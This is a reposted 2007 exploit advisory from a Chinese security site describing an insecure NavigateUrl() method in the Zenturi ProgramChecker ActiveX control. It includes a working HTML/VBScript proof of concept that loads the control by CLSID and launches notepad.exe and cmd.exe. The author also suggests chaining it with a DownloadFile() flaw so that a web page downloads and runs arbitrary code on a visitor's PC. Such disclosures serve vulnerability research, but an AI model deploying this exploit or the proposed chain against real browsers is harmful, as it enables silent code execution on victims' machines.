首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit
来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2007-06-12  
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
<b>Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method</b>

url: http://www.programchecker.com/activeintro.aspx

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

I can't believe my eyes when I see what you can do with this ActiveX
(and I can't believe that this product is considered as antispyware).
You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
Try, for example, to launch "c:\somefile.exe" and see what happen.
Imagine to use this method with the "DownloadFile()" one, you can download
something on the pc and run it without problems.
For the "DownloadFile()" vulnerability see:
<a href=http://www.milw0rm.com/exploits/4008>http://www.milw0rm.com/exploits/4008</a>
-----------------------------------------------------------------------------

<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe()

test.NavigateUrl "notepad.exe" ,"shinnai" ,"_SELF"
test.NavigateUrl "cmd.exe" ,"shinnai" ,"_SELF"

End Sub
</script>
</span></span>
</code></pre>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Animated Cur
·MoviePlay 4.76 .lst File Local
·Yahoo! Messenger Webcam 8.1 Ac
·Yahoo! Messenger Webcam 8.1 (Y
·Yahoo! Messenger Webcam 8.1 Ac
·Yahoo! Messenger Webcam 8.1 (Y
·NewsSync for phpBB 1.5.0rc6 Re
·e-Vision CMS <= 2.02 SQL Injec
·Wordpress 2.2 (xmlrpc.php) Rem
·PHP Real Estate Classifieds Re
·DRDoS - Distributed Reflection
·Internet Download Accelerator
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved